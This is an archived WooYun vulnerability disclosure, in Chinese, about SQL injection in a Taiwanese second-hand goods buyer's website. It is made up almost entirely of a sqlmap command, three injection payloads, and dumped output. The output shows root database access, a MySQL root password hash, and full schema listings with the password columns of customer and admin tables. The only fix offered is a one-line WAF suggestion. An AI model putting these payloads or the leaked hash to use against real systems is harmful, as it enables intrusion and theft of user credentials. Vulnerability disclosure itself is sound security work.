乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-09: 细节已通知厂商并且等待厂商处理中 2015-11-12: 厂商已经确认,细节仅向厂商公开 2015-11-22: 细节向核心白帽子及相关领域专家公开 2015-12-02: 细节向普通白帽子公开 2015-12-12: 细节向实习白帽子公开 2015-12-27: 细节向公众公开
高雄收購誠信經營專業團隊高雄各區各類房屋、土地、庫存、切貨、收購、買賣,如各類家具、家電、酒類、郵幣、珠寶、戒子、K金、黃金、雞血石、壽山石、名錶、有價字畫、禮品、禮卷、好物、名牌包包、精品、飾品、餐飲生財器具、古董、翡翠、汽車、機車、寶塔、美髮椅、五金、、、等各式有價寶物好物收藏品皆可高價到府或到指定公司,免費鑑定收購,二手全新通通都收。
地址:http://**.**.**.**/front/bin/ptlist.phtml?Category=8087
python sqlmap.py -u "http://**.**.**.**/front/bin/ptlist.phtml?Category=8087" -p Category --technique=BET --random-agent --batch --current-user --is-dba --users --passwords --count --search -C pass
current user: 'root@localhost'current user is DBA: Truedatabase management system users [5]:[*] ''@'**.**.**.**'[*] ''@'localhost'[*] 'root'@'**.**.**.**'[*] 'root'@'**.**.**.**'[*] 'root'@'localhost'database management system users password hashes:[*] root [2]: password hash: *D952E90FED3FF853919FB6117880EF6FF58C053F password hash: NULL
Database: ezcatdb+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| word_dict | 388826 || info_dict | 128915 |
Database: ezcatdbTable: sys_ctrl[271 entries]+--------------------------+----------------------+------------------+| sys_cashflow1_cvs_passwd | sys_cashflow1_passwd | sys_forgetpasswd |Database: ezcatdbTable: usr_mstr[918 entries]+----------------+---------------+---------------+---------------+-----------------+| usr_passwd | usr_passwd2 | usr_passwd3 | usr_passwd4 | usr_resetpasswd |Database: ezcatdbTable: sys_ctrl_lcs[272 entries]+----------------+-----------------+| sys_passwd | sys_resetpasswd |Database: ezcatdbTable: cm_mstr[33420 entries]+----------------+----------------+| cm_passwd | cm_resetpasswd |Database: itenginedbTable: cm_mstr[270 entries]+-----------+| cm_passwd |
---Parameter: Category (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: Category=8087 AND 2806=2806 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: Category=8087 AND (SELECT 1931 FROM(SELECT COUNT(*),CONCAT(0x71626a7671,(SELECT (ELT(1931=1931,1))),0x716a6b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: Category=8087 AND SLEEP(5)---web application technology: Apache, PHP 5.2.8back-end DBMS: MySQL 5.0current user: 'root@localhost'current user is DBA: Truedatabase management system users [5]:[*] ''@'**.**.**.**'[*] ''@'localhost'[*] 'root'@'**.**.**.**'[*] 'root'@'**.**.**.**'[*] 'root'@'localhost'database management system users password hashes:[*] root [2]: password hash: *D952E90FED3FF853919FB6117880EF6FF58C053F password hash: NULLDatabase: ezcatdb+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| word_dict | 388826 || info_dict | 128915 || bbs_det | 91852 || sod_det | 72080 || rpd_det | 60868 || cgd_det | 34683 || mail_mstr | 34166 || cm_mstr | 33420 || img_mstr | 28647 || ecp_so_mstr | 28099 || pt_mstr | 27892 || pgd_det | 16870 || so_mstr | 15860 || mnd_det | 13866 || cms_det | 13820 || fld_dict | 12542 || pat_det | 10850 || pg_mstr | 10610 || form | 9811 || sys2_ctrl | 8148 || rcgd_det | 7386 || oem_recvts_det | 7317 || cg_mstr | 6780 || cgm_det | 5191 || ecp_cs_det | 4418 || mo_mstr | 3679 || hln_det | 3167 || msg_dict | 2810 || frd_det | 2700 || img_cg_det | 2353 || fav_det | 1992 || um_mstr | 1782 || cgp_det | 1762 || prg_mstr | 1700 || text_det | 1560 || lnd_det | 1491 || lang_mstr | 1354 || frn_sessions | 1344 || rp_mstr | 1107 || icn_det | 1006 || ads_mstr | 997 || pat_asso | 990 || prv_mstr | 946 || usr_mstr | 918 || fl_self | 915 || log_hist | 721 || rcg_mstr | 656 || cart_tmp | 610 || rcgp_det | 598 || id_mstr | 540 || cod_det | 499 || bon_so_det | 477 || sz_mstr | 466 || css_mstr | 427 || foot_mstr | 395 || fr_mstr | 367 || ln_mstr | 301 || umn_file | 301 || sys_ctrl_lcs | 272 || lcs_mstr | 271 || sys_ctrl | 271 || site_tree | 270 || rcgm_det | 231 || head_mstr | 221 || req_det | 204 || skn_det | 183 || pmsg_det | 167 || hp_mstr | 148 || fls_det | 144 || cl_mstr | 142 || cgl_det | 131 || cf_det | 129 || pc_mstr | 119 || mood_mstr | 118 || vtd_det | 118 || translate_map | 116 || icon | 109 || df_mstr | 97 || pta_det | 93 || bb_mstr | 86 || pt_det | 75 || sessions | 62 || code_mstr | 55 || oem_rld2_det | 55 || ct_mstr | 54 || rld_det | 37 || fl_mstr | 35 || ol_det | 33 || chs_mstr | 32 || cld_det | 30 || FLA_style_mstr | 30 || vt_mstr | 29 || oem_recvt_mstr | 26 || lnp_det | 22 || de_mstr | 20 || oem_fcg_mstr | 20 || pt_bon_det | 20 || oem_adsbid_mstr | 16 || area_mstr | 14 || opd_det | 13 || oem_wk_det | 11 || ftd_det | 10 || ec_stop | 6 || oem_file_det | 5 || oem_down_det | 3 || bon_cs_det | 2 |+---------------------------------------+---------+Database: mysql+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| help_relation | 841 || help_topic | 479 || help_keyword | 404 || help_category | 38 || `user` | 5 || db | 2 |+---------------------------------------+---------+Database: itenginedb+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| sod_det | 2776 || fld_dict | 1609 || word_dict | 1515 || records | 945 || log_hist | 641 || msg_dict | 414 || rpd_det | 316 || fls_det | 279 || prg_mstr | 271 || cm_mstr | 270 || id_mstr | 270 || lcs_det | 270 || info_dict | 246 || rf_mstr | 132 || domains | 131 || icon | 109 || cod_det | 84 || df_mstr | 56 || chs_mstr | 32 || rp_mstr | 20 || mnd_det | 17 || vh_stop | 10 || umn_det | 8 || usr_mstr | 8 || asp_itkeylog_hist | 7 || ec_stop | 6 || lang_mstr | 3 || mod_det | 3 || pt_mstr | 3 || ag_mstr | 1 || indu_mstr | 1 || lcs_mstr | 1 || prv_mstr | 1 || sys_ctrl | 1 |+---------------------------------------+---------+Database: information_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| COLUMNS | 5087 || STATISTICS | 921 || KEY_COLUMN_USAGE | 532 || TABLES | 357 || TABLE_CONSTRAINTS | 324 || COLLATION_CHARACTER_SET_APPLICABILITY | 85 || COLLATIONS | 85 || USER_PRIVILEGES | 77 || SCHEMA_PRIVILEGES | 28 || CHARACTER_SETS | 26 || SCHEMATA | 6 |+---------------------------------------+---------+Database: twe+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| layout_boxes | 364 || configuration | 284 || zones | 90 || phpbb_config | 62 || phpbb_smilies | 42 || banners_history | 18 || configuration_group | 16 || phpbb_search_wordmatch | 13 || content_manager | 12 || phpbb_search_wordlist | 12 || sessions | 7 || customers_status | 6 || orders_status | 6 || shipping_status | 6 || address_format | 3 || address_book | 2 || admin_access | 2 || categories_description | 2 || cm_file_flags | 2 || countries | 2 || currencies | 2 || customers | 2 || customers_info | 2 || languages | 2 || news_categories_description | 2 || news_products_description | 2 || phpbb_groups | 2 || phpbb_user_group | 2 || banners | 1 || categories | 1 || layout_template | 1 || news_categories | 1 || news_products | 1 || news_products_to_categories | 1 || phpbb_categories | 1 || phpbb_forums | 1 || phpbb_posts | 1 || phpbb_posts_text | 1 || phpbb_ranks | 1 || phpbb_themes | 1 || phpbb_themes_name | 1 || phpbb_topics | 1 || whos_online | 1 |+---------------------------------------+---------+columns LIKE 'pass' were found in the following databases:Database: ezcatdbTable: sys_ctrl[3 columns]+--------------------------+-------------+| Column | Type |+--------------------------+-------------+| sys_cashflow1_cvs_passwd | varchar(50) || sys_cashflow1_passwd | varchar(50) || sys_forgetpasswd | tinyint(4) |+--------------------------+-------------+Database: ezcatdbTable: ICQ_opr_mstr[1 column]+----------------+-------------+| Column | Type |+----------------+-------------+| ICQ_opr_passwd | varchar(20) |+----------------+-------------+Database: ezcatdbTable: usr_mstr[5 columns]+-----------------+-------------+| Column | Type |+-----------------+-------------+| usr_passwd | varchar(16) || usr_passwd2 | varchar(16) || usr_passwd3 | varchar(16) || usr_passwd4 | varchar(16) || usr_resetpasswd | varchar(16) |+-----------------+-------------+Database: ezcatdbTable: cm_mstr[2 columns]+----------------+-------------+| Column | Type |+----------------+-------------+| cm_passwd | varchar(16) || cm_resetpasswd | varchar(16) |+----------------+-------------+Database: ezcatdbTable: sys_ctrl_lcs[2 columns]+-----------------+-------------+| Column | Type |+-----------------+-------------+| sys_passwd | varchar(16) || sys_resetpasswd | varchar(16) |+-----------------+-------------+Database: mysqlTable: user[1 column]+----------+----------+| Column | Type |+----------+----------+| Password | char(41) |+----------+----------+Database: itenginedbTable: sys_ctrl_lcs[2 columns]+-----------------+-------------+| Column | Type |+-----------------+-------------+| sys_passwd | varchar(16) || sys_resetpasswd | varchar(16) |+-----------------+-------------+Database: itenginedbTable: admin[5 columns]+-------------------+-------------+| Column | Type |+-------------------+-------------+| admin_passwd | varchar(50) || admin_passwd2 | varchar(50) || admin_passwd3 | varchar(50) || admin_passwd4 | varchar(50) || admin_resetpasswd | varchar(50) |+-------------------+-------------+Database: itenginedbTable: mailbox[1 column]+----------+--------------+| Column | Type |+----------+--------------+| password | varchar(100) |+----------+--------------+Database: itenginedbTable: usr_mstr[5 columns]+-----------------+-------------+| Column | Type |+-----------------+-------------+| usr_passwd | varchar(16) || usr_passwd2 | varchar(16) || usr_passwd3 | varchar(16) || usr_passwd4 | varchar(16) || usr_resetpasswd | varchar(16) |+-----------------+-------------+Database: itenginedbTable: cm_mstr[1 column]+-----------+-------------+| Column | Type |+-----------+-------------+| cm_passwd | varchar(30) |+-----------+-------------+Database: itenginedbTable: cm_mass[1 column]+-----------+-------------+| Column | Type |+-----------+-------------+| cm_passwd | varchar(30) |+-----------+-------------+Database: itenginedbTable: cm_mstr_hist[1 column]+-----------+-------------+| Column | Type |+-----------+-------------+| cm_passwd | varchar(30) |+-----------+-------------+Database: itenginedbTable: ag_mstr[2 columns]+----------------+--------------+| Column | Type |+----------------+--------------+| ag_passwd | varchar(100) || ag_resetpasswd | varchar(100) |+----------------+--------------+Database: tweTable: customers[2 columns]+--------------------+-------------+| Column | Type |+--------------------+-------------+| customers_password | varchar(40) || user_newpasswd | varchar(32) |+--------------------+-------------+
上WAF。
危害等级:高
漏洞Rank:18
确认时间:2015-11-12 18:50
感謝通報
2016-01-07:HITCON 於接獲通報後曾二次 email 該網站所示之服務信箱,但至漏洞公開時仍無回應。